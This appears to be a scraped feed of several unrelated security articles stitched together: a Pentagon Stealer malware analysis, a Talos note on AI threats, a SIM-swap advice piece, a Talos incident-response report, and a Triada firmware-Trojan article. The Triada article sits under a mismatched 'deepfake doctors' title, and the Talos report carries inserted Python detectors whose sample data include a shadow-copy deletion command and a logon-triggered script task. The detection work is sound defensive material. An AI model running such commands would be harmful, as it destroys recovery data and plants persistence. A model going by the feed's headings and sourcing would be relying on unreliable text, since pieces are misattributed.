The stealer and command server communicate via HTTP requests. Upon log creation (create_log()), the victim sends the number of collected passwords, cookies, Discord tokens, and names of all collected files. The server responds with either a rejection or a log_uuid, which is subsequently used as the victim’s identifier, replacing the previously hardcoded uuid.
Image 23. POST request to pentagon[.]cy/create_log shown in ANY.RUN
Image 24. C2 response
Infection Methods
Notably, the Golang version of the stealer lacks any encryption of its code and strings, which is unusual since each subsequent stage of its Python counterpart is encrypted using AES. This suggests the possible existence of a dropper or loader.
A search in TI Lookup involving the stealer yielded the following analysis.
Here is the sample’s execution chain:
Image 25. Attack chain involving the Golang version
The initial attack stage involved running an NSIS installer named BlumBot.exe. The installer executed a VBS script that displayed the familiar message “vcruntime140.dll is missing from your computer”, then launched the next stage, Installer.exe.
Notably, reverse-engineering BlumBot.exe was not necessary to uncover this. A tool capable of unpacking NSIS installers and extracting the .nsi script was enough. In our investigation, we used NanaZip.
NSIS installer in NanaZip:
Image 26. NSIS installer in NanaZip
Fragment of the .nsi script:
Image 27. Piece of .nsi script
Installer.exe is a loader written in Golang. Its sole purpose is to download and execute two files, ByPass.exe and Main.exe, from biteblob[.]com, and then send a Telegram message confirming successful execution.
Following this, the stealer and a second module, which is in fact a miner, are executed.
This is just one example of how Pentagon Stealer is used. In Public Submissions, you can frequently observe samples of various malware using this stealer as one stage in an attack chain.
Further Evolution of Pentagon Stealer
As mentioned, this malware has appeared under various names, although its core functionality remains unchanged, with only minor logical modifications. This trend continues today.
For instance, we recently discovered samples of a stealer with identical code but named BLX Stealer, as indicated by code strings and description in this article.
The attack consists of multiple stages, but we focus on the stealer itself.
This version is written in Python, like its predecessors, but is packaged into an executable using PyInstaller. With pyinstxtractor and pylingual.io, we successfully reconstructed the stealer’s source code for analysis.
In terms of functionality, this version did not branch from the latest Pentagon Stealer but from an earlier build, since it lacks crypto-wallet injection and data theft from Gecko-based browsers other than Mozilla Firefox.
Yet, it has unique features not previously observed:
Extracts clipboard content
Captures screenshots
Reads system information
Retrieves additional Discord user information, including two-factor authentication status, Nitro subscription type, and user badges
Steals Steam and Epic Games account data
The communication protocol with the C2 server is also noteworthy. The stealer does not send files directly; instead, it uploads them to gofile.io and then sends the access link to http[:]//<ip>/tgproxy/{USERID}/.
Image 28. Example of C2 communication
We also discovered a sample with the capability to steal NordVPN configuration files (user.config).
Conclusion
Pentagon Stealer cannot be considered malware capable of complex targeted attacks, given its simplicity. Its development history shows that the authors often merely changed the domain, leaving the functionality intact. However, a year has passed since its first mention, and it has undergone modifications, with the most significant changes occurring this year. The story is far from over, as new, more complex versions continue to emerge, albeit from different authors.
IOCs and TTPs
MITRE ATT&CK
Tactic | Technique | Description
TA0002 Execution | T1059.001 Command and Scripting Interpreter: PowerShell | Disables scanning of drive C: in Microsoft Defender (Python version)
TA0002 Execution | T1059.003 Command and Scripting Interpreter: Windows Command Shell | Executes a .bat file to download the next stage (Python version)
TA0002 Execution | T1059.005 Command and Scripting Interpreter: Visual Basic | Launches a .vbs script to escalate privileges (Python version)
TA0005 Defense Evasion | T1140 Deobfuscate/Decode Files or Information | Decrypts Python stages using Fernet
TA0006 Credential Access | T1555.003 Credentials from Web Browsers | Steals passwords from various browsers
TA0006 Credential Access | T1539 Steal Web Session Cookie | Steals cookies from various browsers
TA0009 Collection | T1005 Data from Local System | Collects files with specific names and extensions from user directories
TA0011 Command and Control | T1071.001 Application Layer Protocol: Web Protocols | Sends collected data to the command server
TA0011 Command and Control | T1659 Content Injection | Injects custom JavaScript code into cryptocurrency wallet software
TA0040 Impact | T1657 Financial Theft | Steals credentials from cryptocurrency wallet software
Pentagon Stealer: Go and Python Malware with Crypto Theft Capabilities (posted 2025-04-29)
2024 wasn’t the year that AI rewrote the cybercrime playbook — but it did turbocharge some of the old tricks. In Cisco Talos’ 2024 Year in Review, with the help of our friends at Robust Intelligence (now a Cisco company), we dissect how cybercriminals used generative AI to scale up social engineering, fine-tune phishing, and automate grunt work like OSINT gathering.
So while AI didn’t completely rock the threat landscape last year, the groundwork is being laid for 2025, where agentic AI and automated vulnerability hunting could cause some significant challenges for defenders. Our research showcases the top four areas of concern for the coming year.
Curious about how AI could impact your defenses, or your data, this year? Take a look at the report’s summary of AI-based threats.
Year in Review: AI based threats (posted 2025-04-29)
“I’m giving away $125 000! Join the project via the link in my profile!” — suddenly, a popular Russian blogger launches a massive cash giveaway on Instagram. A familiar face, speaking in an upbeat voice with a confident tone, appears in Stories. It all looks too good to be true…
That’s because it is. There’s no real project. The blogger didn’t launch anything. Her account was simply hijacked. And the scammers went beyond the usual tricks: not only did they steal access and post a fake giveaway link, but they also stitched together a new video from old footage and dubbed it with a voice generated by neural networks. Read the whole story to learn how Instagram accounts are stolen by swapping SIM cards — and what you can do to protect yourself.
An almost flawless scam campaign
With the rise of AI tools, scammers have suddenly gotten “smarter”. Before, having hacked a blogger, they’d have just posted phishing links and hoped the audience would bite. Now they can run full-fledged PR campaigns from the stolen account. Here’s what the scammers did this time:
One short video. They wrote a script, voiced it with a deepfake of the blogger’s voice, and edited together visuals from her previously posted Reels.
A text post. They published a photo with a tear-jerking caption about how hard it was to launch the project, trying to mimic the blogger’s usual tone.
Four Stories. They reused old Stories where the blogger mentioned a real project, added a link to a phishing site, and reposted them.
All this lends the fake project an air of legitimacy — since bloggers often use content like this across different formats to promote real initiatives. The scammers spared no effort — even throwing in some testimonials from grateful fans; fake ones, of course.
Fake testimonials aimed at encouraging more fans to participate
Let’s take a closer look at the video. At first glance, it’s surprisingly high-quality. It follows all the blog’s rules: the blog’s topic (home renovation), voiceover narration, quick editing. But upon closer examination, the illusion is shattered. Check out the screenshot below: only one video has a watermark in the top-left corner — from the free version of the editing app CapCut. That’s the fake. The other videos don’t have this watermark — because the real blogger either uses the premium version or edits with another app.
The first video is the fake one created by the scammers
There’s another detail: the subtitles. In all her real videos, the blogger uses plain white text with no background. In the fake video, the text is white on a black background. Sure, bloggers sometimes change their style, but usually settings like font and color are saved in their editing software and stay consistent.
What happens if you click the link in the profile?
Here’s where it gets interesting. What kind of “project” exactly were the scammers promoting, and what happens if you click the link?
The bio looks suspicious
If you’re using a device without reliable protection (which would warn you if you try to visit a phishing site), you’ll land on a very basic page: a flashy image, some eye-catching text, and a Claim your prize button. Clicking such buttons typically leads to one of two outcomes: you’ll be asked to pay a commission, or prompted to enter your data — purportedly to receive your winnings. In any case, you’ll be asked to share your bank details. Of course, no prize is coming — it’s pure phishing.
A girl with dollars and a smartphone symbolizes the riches that await… the scammers after they steal your banking account
How did attackers hack the blogger’s Instagram account?
Important: there’s no official version of how the account was compromised yet. It’s a high-profile case, and the blogger has reported it to the police. She currently suspects she fell victim to a SIM-swap attack. In short, this means that the scammers convinced her mobile provider to transfer her phone number to a new SIM card. There are two main ways this can be done:
Old method. Scammers forge a power of attorney and physically visit the mobile provider’s office to request a SIM replacement.
New method. The criminals access the victim’s online account provided by the mobile carrier and remotely issue an eSIM.
SIM swapping allowed the scammers to receive the SMS verification codes, and so to bypass two-factor authentication and convince Instagram support that they were the real account owner. The same trick works against any service that sends verification codes by text, including online banks.
As for the blogger’s original SIM card, it instantly turned into a useless piece of plastic: no internet, no calls, no texts.
How to protect your account from being hacked
Here are the basic rules to prevent most types of account hacks — whether on messaging apps, social networks, forums, or other sites:
Use advanced two-factor authentication with app-generated codes instead of texts (SMS). For Instagram, we recommend also adding a backup method: Settings and activity → Accounts Center → Password and security → Two-factor authentication → Add a backup method. Then, download a dedicated app to generate your login codes.
Follow the golden rule: each service has its own unique password. That way, hackers won’t get access to everything at once.
Ask your mobile operator if it’s possible to either completely prohibit servicing you remotely, or set up a special code you must state in every interaction — remote or in person. This can help protect you from SIM-swapping attacks.
How to protect your social media accounts from SIM swap attacks | Kaspersky official blog (posted 2025-04-28)
Phishing attacks spiked this quarter as threat actors leveraged this method of initial access in half of all engagements, a vast increase from previous quarters. Conversely, the use of valid accounts for initial access was rarely seen this quarter, despite being the top observed method in 2024, according to our Year in Review report. Nevertheless, valid accounts played a prominent role in the attack chains Cisco Talos Incident Response (Talos IR) observed as actors predominately used phishing to gain access to a user account, then leveraged this access to establish persistence in targeted networks.
Ransomware and pre-ransomware incidents made up a slightly larger portion of threats observed this quarter, with most incidents falling into the latter category. Talos IR’s investigations into pre-ransomware events provided unique insight into defensive measures that successfully stopped these attacks before a ransomware executable could be deployed, including early engagement with the incident response team and robust monitoring of certain threat actor tactics, techniques and procedures (TTPs).
Actors leverage access to valid accounts via phishing to establish persistence
Threat actors used phishing to achieve initial access in 50 percent of engagements, a notable increase from less than 10 percent last quarter. Vishing was the most common type of phishing attack seen, accounting for over 60 percent of all phishing engagements, though we also observed malicious attachment, malicious link and business email compromise (BEC) attacks.
Adversaries predominately leveraged phishing to gain access to a valid account, pivot deeper into the targeted network, and expand their foothold, contrasting other phishing objectives we have seen in the past such as eliciting sensitive information or monetary transfers. For example, in an observed vishing campaign — described in further detail in the ransomware section below — adversaries deceived users over the phone into establishing remote access sessions to the user’s workstation, then used this access to load tooling, establish persistence mechanisms and disable endpoint protections.
In some engagements, actors leveraged phishing attacks to steal users’ legitimate access tokens, enabling them to maintain persistent access to the targeted networks. In one engagement, adversaries deployed a phishing email with a malicious link to successfully steal a user’s multi-factor authentication (MFA) session token along with their credentials. From there, the actors gained unauthorized access to the target’s Microsoft Office 365 environment and deployed enterprise applications with the likely goal of gaining further access into additional accounts. In another phishing engagement, upon gaining access to a user’s valid account, the actors cloned their active access token and specified new credentials for outbound connections. They then sought to expand their access by running commands to gather system information and creating a scheduled task to execute a malicious JavaScript file upon user login.
Ransomware trends
Vishing campaign leveraging BlackBasta and Cactus TTPs hits manufacturing and construction organizations
Ransomware and pre-ransomware incidents made up over 50 percent of engagements this quarter, an increase from nearly 30 percent last quarter. A robust campaign leveraging BlackBasta and Cactus TTPs that targeted manufacturing and construction organizations accounted for over 60 percent of pre-ransomware and ransomware engagements and was consistent with public reporting on likely related incidents.
The attack chain we observed begins with the threat actors flooding users’ mailboxes at targeted organizations with a large volume of benign spam emails. After a few days, the actors call the victim, usually via Microsoft Teams, and direct them to initiate a Microsoft Quick Assist remote access session, helping them with installation of the program if not already present on the user’s system. Once a Quick Assist session is established, the adversary loads tooling to collect information about the target system and establish persistence. The actors create the TitanPlus registry key and embed IP addresses to enable command and control (C2) communication, using character substitution to obfuscate the infrastructure. After completing the TitanPlus registry key persistence process, the adversary then performs subsequent privilege escalation and lateral movement, seemingly with the ultimate goal of deploying ransomware. We initially observed the threat actors leveraging BlackBasta ransomware and pivoting to Cactus ransomware after public reporting on their use of the former was released. Our analysis of engagements involving Cactus led us to identify a previously undocumented variant of the ransomware, which builds upon previous functionality with new command-line arguments that provide the threat actors with greater control over the binary’s function, likely to prioritize efficiency and maximum impact.
Looking forward: The threat actors responsible for this campaign have proven to be agile, modifying their TTPs as more public reporting on this campaign emerges, which leads us to assess they will continue to adjust their TTPs and/or incorporate a different ransomware family or tooling into their attack chain moving forward to evade detection. We published our findings on this campaign in our Year in Review report in late March 2025 and will be tracking this activity to see if the threat actors modify their operations moving forward.
Early detection of pre-ransomware TTPs halts attacks before encryption
Out of all ransomware and pre-ransomware engagements this quarter, 75 percent of incidents fell into the latter category, providing insight into defensive measures that successfully stopped these attacks before a ransomware executable could be deployed.
One tactic that proved effective was early engagement with the incident response team. For example, in one engagement, Talos IR was contacted directly after the organization’s users experienced a flood of spam email. Given this TTP was consistent with the vishing campaign we had already observed affecting other organizations, we were able to advise that this was very likely pre-ransomware activity and share actionable indicators of compromise (IOCs) and mitigation recommendations.
Another defensive measure that was effective in containing pre-ransomware activity was robust monitoring and endpoint detection and response (EDR) solutions, particularly those configured to alert on unauthorized remote access connections and suspicious file execution. In one engagement, Cisco XDR was configured to flag certain TTPs that the security team identified were consistent with pre-ransomware activity, and soon after the alerts were triggered, they moved quickly to focus on eradication of the threat. The TTPs included use of remote access tools, disabling of the volume shadow copy service (VSS), and use of a local account to deploy a vulnerable driver. In another engagement, the organization’s monitoring tools alerted them of unauthorized remote access and they acted swiftly to respond to the affected system, resulting in the threat actor only having access to the targeted system for three minutes. In a different incident, suspicious file execution was flagged, leading the customer to identify the threat and isolate the system within hours of initial access.
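The TTPs called out above (remote access tool use, disabling of VSS, a local account loading a driver), together with the TitanPlus registry key from the vishing campaign and the logon-triggered JavaScript scheduled task from the phishing section, can be turned into host-level correlation logic of the kind the XDR alerts describe. The following is an added example written for this page, not Talos or Cisco XDR code: the event schema and field names, the executable names of the remote access tools, the registry key path and the two-rule alert threshold are assumptions, and the telemetry is constructed.

```python
"""Correlate pre-ransomware TTPs per host (added example, not Talos or Cisco XDR code).

Events are simplified dicts standing in for EDR/Sysmon telemetry; the field
names, process names and the two-rule alert threshold are assumptions.
"""
import re
from collections import defaultdict

# Remote access tools named in the report; executable names are assumptions.
REMOTE_ACCESS_TOOLS = {
    "quickassist.exe", "anydesk.exe", "teamviewer.exe", "splashtop.exe",
    "ateraagent.exe", "logmein.exe", "screenconnect.clientservice.exe",
    "tvnserver.exe",
}

# vssadmin deleting shadow copies, or the VSS service being stopped/disabled.
VSS_TAMPER = re.compile(
    r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|sc(?:\.exe)?\s+(?:stop|config)\s+vss)\b",
    re.IGNORECASE,
)
# A scheduled task that runs a .js file at logon (T1053 + JavaScript persistence).
LOGON_JS_TASK = re.compile(
    r"\bschtasks(?:\.exe)?\b.*/sc\s+onlogon\b.*\.js\b", re.IGNORECASE
)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the name of the rule an event matches, or None."""
    kind = event["type"]
    if kind == "process":
        image = _basename(event["image"])
        cmdline = event.get("cmdline", "")
        if image in REMOTE_ACCESS_TOOLS:
            return "remote_access_tool"
        if VSS_TAMPER.search(cmdline):
            return "vss_tampering"
        if LOGON_JS_TASK.search(cmdline):
            return "logon_js_scheduled_task"
    elif kind == "registry" and "titanplus" in event["key"].lower():
        return "titanplus_registry_key"
    elif kind == "driver_load":
        # A local account carries the host name as its domain part (HOST\user).
        domain, _, _ = event.get("user", "").partition("\\")
        if domain and domain.lower() == event["host"].lower():
            return "driver_load_by_local_account"
    return None


def find_pre_ransomware_hosts(events, threshold=2):
    """Hosts on which at least `threshold` distinct rules fired, with the rules."""
    hits = defaultdict(set)
    for ev in events:
        rule = classify(ev)
        if rule:
            hits[ev["host"]].add(rule)
    return {h: sorted(r) for h, r in hits.items() if len(r) >= threshold}


# Constructed sample telemetry (not real incident data); the TitanPlus key path is an assumption.
SAMPLE_EVENTS = [
    {"host": "WS-01", "type": "process", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\QuickAssist.exe", "cmdline": "QuickAssist.exe"},
    {"host": "WS-01", "type": "registry", "user": "CORP\\jdoe",
     "key": "HKCU\\Software\\TitanPlus", "value": "<obfuscated C2 list>"},
    {"host": "WS-01", "type": "process", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS-02", "type": "process", "user": "CORP\\helpdesk",
     "image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe", "cmdline": "TeamViewer.exe"},
    {"host": "SRV-03", "type": "driver_load", "user": "SRV-03\\svc_local",
     "image": "C:\\Windows\\Temp\\drv.sys"},
    {"host": "SRV-03", "type": "process", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": 'schtasks.exe /create /tn Updater /sc onlogon /tr "wscript.exe C:\\Users\\Public\\update.js"'},
]

if __name__ == "__main__":
    for host, rules in find_pre_ransomware_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: pre-ransomware indicators {', '.join(rules)}")
```

A single remote access tool launch (WS-02 above) is common in legitimate support work and is deliberately not alerted on by itself; the value comes from two or more of these behaviours co-occurring on one host within the investigation window, which is what lets a team act in minutes rather than hours.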
Crytox becomes latest ransomware group to leverage HRSword to disable EDR protections
Crytox appeared in a Talos IR engagement for the first time this quarter, with affiliates leveraging HRSword as part of their attack chain — a tool that has not previously been publicly associated with the ransomware group. According to public reporting, Crytox is a ransomware family first seen in 2020 that typically encrypts local disks and network drives and drops a ransom note with a five-day ultimatum. Affiliates are known to leverage the uTox messenger application so victims can communicate with the threat actors.
Talos IR responded to an engagement in which adversaries exploited a public-facing application that was not protected by MFA to gain initial access, then launched a ransomware attack that encrypted two hypervisors hosting numerous VM servers. The actors used TTPs that aligned with known Crytox TTPs, including using uTox for communication and dropping a ransom note that matches publicly shared Crytox ransom notes. Of note, we also observed the affiliates using HRSword to disable the target’s EDR solution. We first reported on ransomware actors’ use of HRSword in FY24 Q1, specifically highlighting a Phobos incident, and observed additional threat groups leverage the tool throughout the remainder of the year.
Targeting
The manufacturing industry vertical was the most affected this quarter, accounting for 25 percent of engagements. Notably, though education was the most targeted vertical for the second half of 2024, we did not respond to any incidents targeting education entities this quarter.
Initial access
As mentioned, the most observed means of gaining initial access this quarter was phishing, followed by use of valid accounts and exploitation of public-facing applications. The increase in phishing attacks this quarter is likely due in part to the robust vishing campaign we observed, which accounted for over 60 percent of all phishing engagements.
Recommendations for addressing top security weaknesses
Implement properly configured MFA and other access control solutions
Half of the engagements this quarter involved MFA issues, including misconfigured MFA, lack of MFA and MFA bypass. As mentioned in the above ransomware section, token theft played a role in several incidents this quarter, enabling threat actors to bypass authentication controls and establish trusted connections. We also observed threat actors adding malicious secondary MFA devices to compromised accounts as well as taking advantage of a lack of MFA on remote access services, the latter of which is a tactic we have consistently observed in previous quarters. Talos IR recommends monitoring and alerting on the following for effective MFA deployment: abuse of bypass codes, creation of accounts designed to bypass or be exempt from MFA and removal of accounts from MFA.
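The monitoring items Talos IR lists (bypass-code abuse, creation of MFA-exempt accounts, removal of accounts from MFA) plus the secondary-device addition and the lack of MFA on remote access services noted in the same paragraph, as an added example in Python that is not Talos tooling. The audit event shape, its field names and the service-inventory shape are assumptions that a real deployment would map onto its identity provider's audit log; the events and the inventory are constructed.

```python
"""Alert on MFA-weakening identity events (added example, not Talos tooling).

The audit event shape, field names and the service-configuration shape are
assumptions; a real deployment would map its identity provider's audit log
onto these fields.
"""
from collections import Counter

BYPASS_CODE_THRESHOLD = 2  # bypass-code uses per account before alerting (assumption)


def mfa_alerts(events, bypass_threshold=BYPASS_CODE_THRESHOLD):
    """Return (rule, target_account, acting_account) tuples in event order."""
    alerts = []
    bypass_uses = Counter()
    for ev in events:
        action, target, actor = ev["action"], ev["target"], ev["actor"]
        if action == "mfa_bypass_code_used":
            # Bypass codes are for recovery; repeated use on one account is abuse.
            bypass_uses[target] += 1
            if bypass_uses[target] == bypass_threshold:
                alerts.append(("repeated_bypass_code_use", target, actor))
        elif action == "user_created" and ev.get("mfa_exempt", False):
            alerts.append(("mfa_exempt_account_created", target, actor))
        elif action == "mfa_requirement_removed":
            alerts.append(("account_removed_from_mfa", target, actor))
        elif action == "mfa_device_registered" and ev.get("existing_devices", 0) >= 1:
            # A second authenticator enrolled on an already-enrolled account is the
            # "malicious secondary MFA device" pattern; confirm with the user.
            alerts.append(("secondary_mfa_device_added", target, actor))
    return alerts


def services_missing_mfa(services):
    """Names of externally reachable remote access services not enforcing MFA."""
    return sorted(name for name, cfg in services.items()
                  if cfg.get("external") and not cfg.get("mfa_required"))


# Constructed audit events (not from a real tenant).
SAMPLE_EVENTS = [
    {"action": "mfa_bypass_code_used", "target": "alice", "actor": "alice"},
    {"action": "mfa_device_registered", "target": "alice", "actor": "alice", "existing_devices": 1},
    {"action": "mfa_bypass_code_used", "target": "alice", "actor": "alice"},
    {"action": "user_created", "target": "svc-backup2", "actor": "admin-bob", "mfa_exempt": True},
    {"action": "user_created", "target": "carol", "actor": "admin-bob", "mfa_exempt": False},
    {"action": "mfa_requirement_removed", "target": "dave", "actor": "admin-bob"},
    {"action": "mfa_device_registered", "target": "carol", "actor": "carol", "existing_devices": 0},
]

# Constructed remote access service inventory.
SAMPLE_SERVICES = {
    "vpn-gateway": {"external": True, "mfa_required": True},
    "rdp-jump-host": {"external": True, "mfa_required": False},
    "intranet-wiki": {"external": False, "mfa_required": False},
}

if __name__ == "__main__":
    for rule, target, actor in mfa_alerts(SAMPLE_EVENTS):
        print(f"ALERT {rule}: account={target} by={actor}")
    print("remote access without MFA:", services_missing_mfa(SAMPLE_SERVICES))
```

Each alert carries both the target account and the acting account, because the interesting cases are the ones where they differ (an administrator exempting someone else) or where a freshly compromised user enrolls a device for themselves; the inventory check is the configuration-side counterpart, run against the list of internet-facing services rather than against events.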
Enforce user education on phishing and social engineering attacks
Half of the engagements this quarter involved social engineering, potentially highlighting insufficient user education. This security weakness corresponds with the surge in phishing attacks, as users were manipulated to grant attackers access to their environments, with vishing proving to be particularly effective. Talos IR recommends raising awareness of phishing and social engineering techniques, as user education is a key part of spotting phishing attempts, countering MFA bypass techniques and knowing where to report suspicious activity.
Protect endpoint security solutions
Almost 20 percent of incidents involved organizations that did not have protections in place to prevent uninstallation of EDR solutions, enabling actors to disable these defenses. Talos IR strongly recommends ensuring endpoint solutions are protected with an agent or connector password and customizing their configurations beyond the default settings. Additional recommendations for hardening EDR solutions against this threat can be found in our 2024 Year in Review report.
Top-observed MITRE ATT&CK techniques
The table below lists the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
This was the first quarter since January to March of 2024 (Q1 FY24) in which phishing was the top initial access technique, with actors leveraging vishing, malicious links, malicious attachments and BEC attacks.
We observed actors leveraging a wider variety of commercial and open-source remote access tools this quarter, including SplashTop, Atera, TeamViewer, AnyDesk, LogMeIn, ScreenConnect, QuickAssist, TightVNC and Level’s RMM platform. These tools appeared in 50 percent of engagements, a slight increase from almost 40 percent last quarter.
Tactic / Technique / Example
Reconnaissance (TA0043)
T1590 Gather Victim Network Information
Adversaries may gather information about the victim’s networks that can be used during targeting. Information may include a variety of details, including administrative data as well as specifics regarding its topology and operations.
T1595.002 Active Scanning: Vulnerability Scanning
Adversaries may run vulnerability scans against an organization’s public-facing infrastructure to identify potential vulnerabilities to exploit.
Initial Access (TA0001)
T1598.004 Phishing for Information: Spearphishing Voice
In an observed campaign, users received calls from the adversary posing as IT support and were prompted to initiate a QuickAssist session.
T1598.003 Phishing for Information: Spearphishing Link
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting.
T1598 Phishing for Information: Spearphishing Attachment
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting.
T1190 Exploit Public-Facing Application
Adversaries may exploit a vulnerability to gain access to a target system.
T1078 Valid Accounts
Adversaries may use compromised credentials to access valid accounts during their attack.
Execution (TA0002)
T1059.001 Command and Scripting Interpreter: PowerShell
Adversaries may abuse PowerShell to execute commands or scripts throughout their attack.
T1047 Windows Management Instrumentation
Adversaries may use Windows Management Instrumentation (WMI) to execute malicious commands during the attack.
T1053 Scheduled Task/Job
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
Persistence (TA0003)
T1098 Account Manipulation
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems.
T1136.001 Create Account: Local Account
Adversaries may create a local account to maintain access to victim systems.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Adversaries established persistence by embedding IP addresses in the TitanPlus registry key.
T1133 External Remote Services
Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
T1546.008 Event Triggered Execution: Accessibility Features
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.
Privilege Escalation (TA0004)
T1134 Access Token Manipulation
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.
Defense Evasion (TA0005)
T1562.001 Impair Defenses: Disable or Modify Tools
Adversaries may disable or uninstall security tools to evade detection.
T1562.004 Impair Defenses: Disable or Modify System Firewall
Adversaries may disable or modify system firewalls to bypass controls limiting network usage.
T1564.008 Hide Artifacts: Email Hiding Rules
Adversaries may use email rules to hide inbound or outbound emails in a compromised user’s mailbox.
T1070.001 Indicator Removal: Clear Windows Event Logs
Adversaries may clear the Windows event logs to cover their tracks and impair forensic analysis.
T1112 Modify Registry
Adversaries used registry modifications to escalate privileges.
Credential Access (TA0006)
T1003 OS Credential Dumping
Adversaries may dump credentials from various sources to enable lateral movement.
T1528 Steal Application Access Token
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Discovery (TA0007)
T1046 Network Service Discovery
Adversaries may use tools like Advanced Port Scanner for network scanning.
T1057 Process Discovery
Adversaries may attempt to get information about running processes on a system.
T1018 Remote System Discovery
Adversaries may attempt to discover information about remote systems with commands, such as “net view”.
T1082 System Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware.
T1016 System Network Configuration Discovery
Adversaries may use commands, such as ifconfig and net use, to identify network connections.
Lateral Movement (TA0008)
T1021.001 Remote Services: Remote Desktop Protocol
Adversaries may abuse valid accounts using RDP to move laterally in a target environment.
T1021.006 Remote Services: Windows Remote Management
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM).
Command and Control (TA0011)
T1219 Remote Access Software
An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.
T1105 Ingress Tool Transfer
Adversaries may transfer tools from an external system to a compromised system.
T1572 Protocol Tunneling
Adversaries may tunnel network communications to and from a victim system within a separate protocol, such as SMB, to avoid detection and/or enable access.
Exfiltration (TA0010)
T1048 Exfiltration Over Alternative Protocol
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel, such as WinSCP.
Impact (TA0040)
T1486 Data Encrypted for Impact
Adversaries may use ransomware to encrypt data on a target system.
T1490 Inhibit System Recovery
Adversaries may disable system recovery features, such as volume shadow copies.
T1489 Service Stop
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.
Software/Tool
S0029 PsExec
Free Microsoft tool that can remotely execute programs on a target system.
S0349 LaZagne
A post-exploitation, open-source tool used to recover stored passwords on a system.
S0357 Impacket
An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols.
S0002 Mimikatz
Credential dumper that can obtain plaintext Windows logins and passwords.
S0097 Ping
An operating system utility commonly used to troubleshoot and verify network connections.
S0552 AdFind
Freely available command-line query tool used for gathering information from Active Directory.
S1071 Rubeus
A C# toolset designed for raw Kerberos interaction.
S0057 Tasklist
A utility that displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer.
Posted by admin, 2025-04-26: Deepfake ‘doctors’ take to TikTok to peddle bogus cures
The familiar checkout ritual at the supermarket: once everything has been scanned, the offer comes, delivered with a hopeful smile: “Chocolate bar for the road? It’s a good one, and the discount is almost criminal.” If you’re lucky, you get a delicious bonus at a great price. But more often than not they’re trying to sell you something that’s not selling well: either it’s about to expire or it has some other hidden flaw.
Now, imagine you declined that chocolate bar, but it was secretly slipped into your bag anyway, or even worse, into your pocket, where it melted and ruined your clothes, spoiling your day. Well, something similar happened to those who bought knock-offs of popular smartphone brands from online marketplaces. No, they didn’t get a chocolate bar. They walked away with a brand-new smartphone that had the Triada Trojan embedded in its firmware. This is much worse than melted chocolate. Their crypto balances, along with their Telegram, WhatsApp, and social media accounts, could be gone before they could utter “bargain!”. Someone could steal their text messages and a lot more.
Triada? What Triada?
That’s the name we at Kaspersky gave to the Trojan we first discovered and described in detail in 2016. This mobile malware would infiltrate almost every process running on a device, while residing only in the RAM.
The emergence of Triada spelled a new era in the evolution of mobile threats targeting Android. Before Triada, Trojans were relatively harmless — mainly displaying ads and downloading other Trojans. This new threat showed that things would never be the same again.
With time, Android developers fixed the vulnerabilities that early versions of Triada exploited. Recent Android versions restrict even users with root privileges from editing system partitions. Did this stop the cybercriminals? What do you think?
Fast-forward to March 2025, and we discovered an adapted version of Triada that takes advantage of the new restrictions. The threat actor infects the firmware even before the smartphones are sold. Pre-installed in system partitions, the malware proves nearly impossible to remove.
What is this new version capable of?
Our Android security solution detects the new version of Triada as Backdoor.AndroidOS.Triada.z. This new version is what’s embedded in the firmware of fake Android smartphones available from online marketplaces. It can attack any application running on the device. This gives the Trojan virtually unlimited capabilities. It can control text messages and calls, steal crypto, download and run other applications, replace links in browsers, surreptitiously send messages in chat apps on your behalf, and hijack social media accounts.
A copy of Triada infiltrates every app launched on an infected device. Besides that, the Trojan includes specialized modules that target popular apps. As soon as the user downloads a legitimate app like Telegram or TikTok, the Trojan embeds itself in it and starts causing harm.
Telegram. Triada downloads two modules to compromise Telegram. The first one initiates malicious activity once a day, connecting to a command-and-control (C2) server. It sends the victim’s phone number to the criminals, along with complete authentication data — including the access token. The second module filters all messages, interacting with a bot (which didn’t exist at the time of our research), and deleting notifications about new Telegram logins.
Instagram. Once a day, the Trojan runs a malicious task to search for active session cookies and forward the data to the attackers. These files help the criminals assume full control over the account.
Browsers. Triada threatens a number of browsers: Chrome, Opera, Mozilla, and some others. The full list is available in the Securelist article. The module connects to the C2 server over TCP and randomly redirects legitimate links in the browsers to advertising sites for now. However, because the Trojan downloads redirect links from its C2 server, attackers can direct users to phishing sites at any time.
WhatsApp. Again, there are two modules. The first one collects and sends data about the active session to the C2 server every five minutes — giving the attackers full access to the victim’s account. The second one intercepts the client functions for sending and receiving messages, which allows the malware to send and then delete arbitrary instant messages to cover its tracks.
LINE. The dedicated Triada module collects internal app data, including authentication data (access token), every 30 seconds, and forwards it to the C2 server. In this case, too, someone else assumes full control of the user’s account.
Skype. Although Skype is about to be retired, Triada still has a module for infecting it. Triada uses several methods to obtain the authentication token and then sends it to the C2 server.
